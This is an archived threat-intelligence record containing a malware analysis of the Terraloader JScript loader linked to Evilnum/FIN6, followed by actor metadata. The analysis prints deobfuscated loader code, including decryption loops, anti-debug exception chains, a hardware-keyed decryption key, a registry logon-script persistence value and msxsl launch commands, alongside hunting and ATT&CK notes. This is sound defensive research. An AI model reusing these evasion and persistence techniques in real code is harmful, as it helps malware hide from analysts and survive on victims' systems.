{ "id": "fd8a3368-862d-48d7-aa69-9b669fcf0b8c", "created_at": "2026-04-06T00:13:38.236697Z", "updated_at": "2026-04-10T03:34:23.520375Z", "deleted_at": null, "sha1_hash": "4e0e40b169a48fedd9d1aebd59f36d125273fd26", "title": "CyberThreatIntel/Additional Analysis/Terraloader/2021-03-25/Analysis.md at master · StrangerealIntel/CyberThreatIntel", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1155052, "plain_text": "CyberThreatIntel/Additional Analysis/Terraloader/2021-03-\r\n25/Analysis.md at master · StrangerealIntel/CyberThreatIntel\r\nBy StrangerealIntel\r\nArchived: 2026-04-05 20:00:27 UTC\r\nTerraloader : Congrats, you have a new fake job !\r\nThe present analysis focused on the differences between the last analysis and tweets, you can see it on the\r\nreferences.\r\n[2020-09-03] Analysis of improvement of the \"Normal\" version\r\n[2020-07-26] Code of \"Killswitch\" version\r\n[2020-07-21] Analysis of \"Killswitch\" version\r\n[2020-04-12] Analysis of improvement of the \"Normal\" version\r\n[2020-01-02] Analysis of \"Normal\" version\r\nObfuscation\r\nThe initial access rest an XSL file that content the obfuscated JS script. This use different templates of\r\nobfuscation that more in the objective to make FUD the payload that make the analysis difficult for the\r\nanalyst due to this see quickly the redundancy of the operations performed. This only for performing the\r\nmaximum of math operations for evading the detection, by example, calculations of mathematical\r\noperations in the part related to decryption for have the limit value, has no use but the functionality to\r\nprioritize other operations are as many actions that a detection engine must manage and used in this way.\r\nHere, we can list the different template, the numbers of letters and numbers are included in a specific range\r\nbut given the fact that this is distributed in the MAAS model, it may be on a higher range or operations to\r\nincrease detection reduction:\r\n // Obfuscation patterns used\r\n var a;\r\n var b;\r\n a = [0-9]{1,3};\r\n b = a [ + - / * ] [0-9]{1,3};\r\n var a;\r\n var b;\r\n a = [a-z]{1,3};\r\n [a or b]= [a or b] + [a-z]{1,6};\r\n if ((a + b) == [a-z]{1,3}) {[a or b] = [0-9]{1,3}; }\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 1 of 15\n\nvar a;\r\n var b;\r\n a = [a-z]{1,3};\r\n [a or b]= [a or b] + [a-z]{1,6};\r\n if ( [a or b] == [a-z]{1,3}) { [a or b] = [0-9]{1,3}; }\r\nAs previously explained, that easily to understand that the code that from a template, the attacker uses a\r\nvariable understood by his script to add obfuscation to his script, I think that other existing variables to fill\r\nthe payloads like the second layer, the DLL and the document read in order to avoid to corrupt the data of\r\nthe payload.\r\n // Before obfuscation process\r\n var MatAr = [];\r\n {obfuscate me}\r\n MatAr[0] = 50;\r\n MatAr[1] = 69;\r\n [...]\r\n MatAr[24] = 50;\r\n MatAr[25] = 70;\r\n {obfuscate me}\r\n return MatAr;\r\n // After obfuscation process\r\n var MatAr = [];\r\n var a;\r\n var b;\r\n a = 418;\r\n b = a * 4;\r\n MatAr[0] = 50;\r\n MatAr[1] = 69;\r\n [...]\r\n MatAr[24] = 50;\r\n MatAr[25] = 70;\r\n var a;\r\n var b;\r\n a = 944;\r\n b = a + 1;\r\n if (b == 711) { b = 43; }\r\n return MatAr;\r\nDuplicate error or wanted obfuscation ?\r\nThe subject of the duplicated matrix for the decryption remains a mystery to determinate if it's voluntary\r\nfor making more obfuscation, in a certain logic, the copy/paste of the same blocks of code and name of\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 2 of 15\n\nfunctions in the template add a lot of obfuscation to avoid detection of the AV engine.\r\nImprovements\r\nCompared to the \"Killswitch\" version, the \"Normal\" version uses the same process, decrypt the payload\r\nand run the second layer pushed in memory but compared at the \"Killswitch\" version that check the\r\nprocessor or/and network card or/and user account for identifier for see if it's the good victim. If good, the\r\npayloads will be correctly decrypted and can run. Hence the notion of killswitch and had to find the good\r\nparameters without knowing specific hardware informations for getting the payloads and C2\r\ninfrastructures.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 3 of 15\n\nHere the process execution of the \"Normal\" version, that's probably that the same ending for the\r\n\"KillSwitch\" version once the next decrypt round based on hardware information :\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 4 of 15\n\nThe main improvements of the last version are on the increasing the numbers of the ciphers used for the\r\ndecryption process and the anti-debugger with exception states. For the rest, that's still when the matrix\r\nused for the decryption of data is the same that the reference that a token is given for ensure that the\r\ndecryption is finish and run the payloads.\r\nvar Mat1 = Initmatrix1();\r\n var Mat2 = Initmatrix2();\r\n var Token = 0;\r\n var s = \"\";\r\n var n = 0;\r\n var tmpArray = [];\r\n OpAr[0] = 74;\r\n OpAr[1] = 68;\r\n OpAr[2] = 77;\r\n OpAr[3] = 105;\r\n OpAr[4] = 115;\r\n OpAr[5] = 104;\r\n OpAr[6] = 110;\r\n OpAr[7] = 108;\r\n OpAr[8] = 80;\r\n OpAr[9] = 69;\r\n OpAr[10] = 109;\r\n OpAr[11] = 67;\r\n OpAr[12] = 120;\r\n OpAr[13] = 99;\r\n OpAr[14] = 71;\r\n OpAr[15] = 76;\r\n OpAr[16] = 68;\r\n OpAr[17] = 117;\r\n OpAr[18] = 79;\r\n OpAr[19] = 113;\r\n OpAr[20] = 119;\r\n OpAr[21] = 82;\r\n OpAr[22] = 109;\r\n OpAr[23] = 100;\r\n OpAr[24] = 75;\r\n OpAr[25] = 107;\r\n var id = 26;\r\n var i = 0;\r\n var result;\r\n do {\r\n s = (i + \"\");\r\n n = s.length;\r\n if (n === 1) {\r\n OpAr[id] = SwitchVal(i);\r\n } else {\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 5 of 15\n\ntmpArray = SplitVal(s);\r\n OpAr[id] = SwitchVal(tmpArray[0]);\r\n switch (n) {\r\n case 2:\r\n OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n break;\r\n case 3:\r\n OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n break;\r\n case 4:\r\n OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n OpAr[id + 3] = SwitchVal(tmpArray[3]);\r\n break;\r\n case 5:\r\n OpAr[id + 1] = SwitchVal(tmpArray[1]);\r\n OpAr[id + 2] = SwitchVal(tmpArray[2]);\r\n OpAr[id + 3] = SwitchVal(tmpArray[3]);\r\n OpAr[id + 4] = SwitchVal(tmpArray[4]);\r\n break;\r\n }\r\n }\r\n result = Decrypt(Mat2, OpAr, n + id);\r\n if (CompareLengthObjects(result, Mat1) === true) {\r\n Token = 474;\r\n }\r\n i = i + 1;\r\n } while (Token === 0);\r\nAs a result, the management of data alignment to add additional steps to reorder the data in the array\r\nindexes.\r\nfunction InitBase(Arg) {\r\n if (Arg) {\r\n var lim = Arg.length;\r\n var r = [];\r\n var j = 0;\r\n var i = 0;\r\n var lock = -1;\r\n var o;\r\n var index = 0;\r\n var t = [];\r\n t = SplitVal(Arg);\r\n if (t) {\r\n do {\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 6 of 15\n\no = FillAr(RefBase, t[index]);\r\n if (o !== -1) {\r\n if (lock \u003c 0) { lock = o; }\r\n else {\r\n lock = lock + o * 91;\r\n j = j | lock \u003c\u003c i;\r\n if ((lock \u0026 8191) \u003e 88) { i = i + 13; }\r\n else { i = i + 14; }\r\n do {\r\n PushElement(r, j \u0026 255);\r\n j = j \u003e\u003e 8;\r\n i = i - 8;\r\n } while (i \u003e 7);\r\n lock = -1;\r\n }\r\n }\r\n index = index + 1;\r\n } while (index \u003c lim);\r\n if (lock \u003e -1) {\r\n PushElement(r, (j | lock \u003c\u003c i) \u0026 255);\r\n }\r\n return (r);\r\n }\r\n }\r\n}\r\nNote : by the fact that the size of the reference matrix to the two others matrices is often the same, so there\r\nis a good chance that the offset is fixed (near 29), only the key varies accordingly.\r\nDump the payloads\r\nOnce the key and the offset obtained, we can extract the data once, the decryption phase performed, the\r\ndata returned are in hexadecimal. The following function gives the result converted to ASCII, useful for\r\nobtaining the following script layers:\r\nfunction InitDecrypt(Arg1, Arg2, Arg3) {\r\n \r\n var tmp = InitBase(Arg1);\r\n // Decrypt the data\r\n var r = Decrypt(tmp, Arg2, Arg3);\r\n // Data are in raw mod (hex)\r\n console.log(\"r = \"+r)\r\n // Here the program convert the data to char and join all the data\r\n return JoinTab(r);\r\n}\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 7 of 15\n\nThe data returned in hexadecimal can directly be saved in a binary file, useful for extracting the DLL and\r\nthe lure document :\r\n[io.file]::WriteAllBytes($SavePath,$Data)\r\nSecond loader and lure\r\nThis drops TerraStealer and the lure for a fake employement.\r\nLike the last time analysed, we see can note that still the same structure for the dropper but renamed.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 8 of 15\n\nStrangely, even if the verification shows later in the process that this is not a victim that's focus the threat\r\nactor and that there isn't ability to delete the js terraloader scripts as an anti-forensic or the persistence\r\nmethod which confirms that these are all solutions on demand and not as pack otherwise the same logic\r\nwould be applied everywhere.\r\n// Persistence by login/logoff helper in regisry for load as script to launch when the session is open after th\r\nKey: HKEY_CURRENT_USER\\Environment\r\nName: UserInitMprLogonScript\r\nValue: cscripT /B /e:jsCript \"%APPDATA%\\Microsoft\\7AF60BCC.txt\"\r\nThis writes the next payloads of killswitch version of Terraloader in the disk, remove the dll (with a fake\r\nocx extension) and launches it in calling the msxsl present in the compromised system.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 9 of 15\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 10 of 15\n\nThis executes the following commands for getting the performances of system for check common anti-debug artefacts by typeperf and remove it on the disk like said previously.\r\ntypeperf.exe \"\\System\\Processor Queue Length\" -si 600 -sc 1\r\nC:\\Windows\\system32\\cmd.exe /c del \"C:\\Users\\admin\\AppData\\Local\\Temp\\58611.ocx\" \u003e\u003e NUL\r\nThis execute first of two JS files for launch the second terraloader by MSXML, this use variables for\r\ncontent characters and obfuscate the payload.\r\n var pzuunawd96 = \"\\\\\";\r\n var pzuunawd6 = \"x\";\r\n var pzuunawd5082 = \".\";\r\n var pzuunawd423 = \"e\";\r\n var pzuunawd4 = \"s\";\r\n var pzuunawd33 = \"l\";\r\n var pzuunawd66 = \"t\";\r\n var pzuunawd8 = \"M\";\r\n var pzuunawd396 = \"a\";\r\n var pzuunawd25 = \"p\";\r\nOnce removing the obfuscation, we can now see it and see the new value as code error returned to C2, this\r\nallows to the group to know if the sample has been opened, have infected a system but don't have run the\r\nsecond layer or infected but not the good target by hardware/account verification process.\r\nvar Code = 0;\r\nfunction GetActX(a) {return new ActiveXObject(a); }\r\ntry\r\n{\r\n var ObjX = GetActX(\"shell.application\");\r\n ObjX.ShellExecute(\"Msxsl.exe\", \"3850FC6E77257.txt 3850FC6E77257.txt\", \"C:\\\\Users\\\\admin\\\\AppData\\\r\n}\r\ncatch (e) { Code = 629; }\r\nThis version is like version of September 2020 has a fixed size the comparison of the two objects, doesn't\r\nhave a method to push elements into arrays so it goes through a global variable and fewer ciphers in the\r\ndecryption process but passes by an additional argument the number of cycles to add to the process.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 11 of 15\n\nOne point of interest is to see although this is the old version, it still has the exceptions added in the last\r\nversion to avoid debugging them with operations on non-existent variable values.\r\n exec = function(a) {\r\n try {\r\n excepval = excepval + 609;\r\n } catch (e) {\r\n try {\r\n excepval2 = excepval2 / 528;\r\n } catch (e2) {\r\n try {\r\n excepval3 = excepval3 * 277;\r\n } catch (e3) {\r\n try {\r\n excepval4 = excepval4 - 904;\r\n } catch (e4) {\r\n return (Function(a))();\r\n }\r\n }\r\n }\r\n }\r\n };\r\n try {\r\n DebVal1 = DebVal1 + 830\r\n } catch (e5) {\r\n try {\r\n DebVal2 = DebVal2 - 529;\r\n } catch (e6) {\r\n try {\r\n DebVal3 = DebVal3 / 108;\r\n } catch (rincbz62) {\r\n exec(InitDecrypt(PayLayer2, OpAr, off, 4937));\r\n }\r\n }\r\n }\r\nThe second layer still content a function for getting the char from the int and the second loop that's only\r\ndecryptable by the computer of the victim. That's so not possible to see after but looks like last step of JS\r\nbackdoor with the configuration inside (parameters + final C2 to contact).\r\n function Getkey()\r\n {\r\n try\r\n {\r\n var ActXObj1 = GetActX(\"WScript.Shell\");\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 12 of 15\n\nvar p = ActXObj1.Environment(\"PROCESS\");\r\n var NetActX = GetActX(\"WScript.Network\");\r\n var result = NetActX.ComputerName + p(\"PROCESSOR_IDENTIFIER\");\r\n return result;\r\n }\r\n catch(e) {return false;}\r\n }\r\n [...]\r\n var k = Getkey();\r\n ShObj = \"\";\r\n proc = \"\";\r\n NetObj = \"\";\r\n IdProc = \"\";\r\n var lim = k.length;\r\n var tmp = k.split(\"\");\r\n Ar[off] = GetCharFromInt(tmp[0]);\r\n var i = 1;\r\n do {Ar[off + i] = GetCharFromInt(tmp[i]);\r\n i = i + 1;\r\n } while (i \u003c lim);\r\n k = \"\";\r\n tmp = [];\r\n Exec(Decrypt(FinalPayload, Ar, off + lim, 50360));\r\nFIN6 or Evilnum ?\r\nThe indicators and TTPs seem more related to the Evilnum group than FIN6 that historically used on the\r\nPOS, two versions are used seems to depend on if the group has specific information of an important victim\r\nin the hierarchy (VIP) probably already having initial access with TerraTV or TerraPreter and therefore\r\nthe loader serves only as transport for pivoting.\r\nHere, that's coupled by the dropping DLL but sometimes only the \"Normal\" version is used for no specific\r\ntargets operations. That can be one of a way for having the precious information for the \"killswitch\"\r\nversion in more leaks and probably internal compromise via the help of an employee or admin.\r\nAnother method rest possible but not confirmed, an attacker can send single spear-phishing on a sinkhole\r\nwith a js script that can give the informations on the cores and on the next step, send later terraloader with\r\nthe payload encrypted with the account + core info as key.\r\nHunting\r\nLike the dll push the js script and the msxsl, this can be interesting artefacts. In seeing the msxsl we can see\r\nthat the same hash that's dropped, this logical due to that use the same template of data for MAAS model.\r\nBy example, Anyrun use this fact and allows to hunting by the calls of msxsl.exe, we can see with strong\r\nenough confidence that's the samples are from terraloader :\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 13 of 15\n\nAll the references of useful artefacts can be consult here and all the codes here.\r\nCyber kill chain\r\nThe process graph resume cyber kill chains used by the attacker :\r\nIndicators Of Compromise (IOC)\r\nThe IOC can be exported in JSON\r\nReferences MITRE ATT\u0026CK Matrix\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 14 of 15\n\nEnterprise tactics Technics used Ref URL\r\nExecution\r\nWindows Management Instrumentation\r\nCommand-Line Interface\r\nhttps://attack.mitre.org/techniques/T1047\r\nhttps://attack.mitre.org/techniques/T1059\r\nPersistence Registry Run Keys / Startup Folder https://attack.mitre.org/techniques/T1060\r\nDefense Evasion Install Root Certificate https://attack.mitre.org/techniques/T1130\r\nDiscovery Query Registry https://attack.mitre.org/techniques/T1012\r\nThis can be exported as JSON format Export in JSON\r\nLinks\r\nLinks Anyrun:\r\n000a5e63109b3c653d63d84d03fe474242b987bfadda9aeaa200653fd2155a31.sct\r\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terral\r\noader--congrats-you-have-a-new-fake-job-https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-Page 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-" ], "report_names": [ "Analysis.md#terraloader--congrats-you-have-a-new-fake-job-" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434418, "ts_updated_at": 1775792063, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.pdf", "text": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.txt", "img": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.jpg" } }